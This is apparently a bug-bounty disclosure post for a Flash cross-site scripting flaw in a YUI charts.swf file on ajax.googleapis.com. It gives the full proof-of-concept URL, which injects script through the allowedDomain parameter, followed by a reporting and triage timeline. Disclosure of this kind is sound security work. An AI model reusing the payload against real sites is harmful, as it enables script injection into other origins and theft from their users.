Flash XSS in ajax.googleapis.com

Description:

URL: http://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(document.domain)}//


Timeline:

mm/dd/yyyy

11/25/2020 - Submit Report.
11/25/2020 - First Response.
11/26/2020 - Triaged.
    Priority: P4 - P3.
    Status: New - Assigned.
11/28/2020 - Nice catch!
    Type: Customer Issue - Bug.
    Priority: P3 - P2.
    Severity: S4 - S2.
    Status: Assigned - Accepted.
12/02/2020 - Honorable Mentions.
XX/XX/2021 - Fixed. (posted after fixed)

LinkedIn: Alessandro Rumampuk
YouTube: R,ando
Facebook: Ando
Twitter: R ando

Comments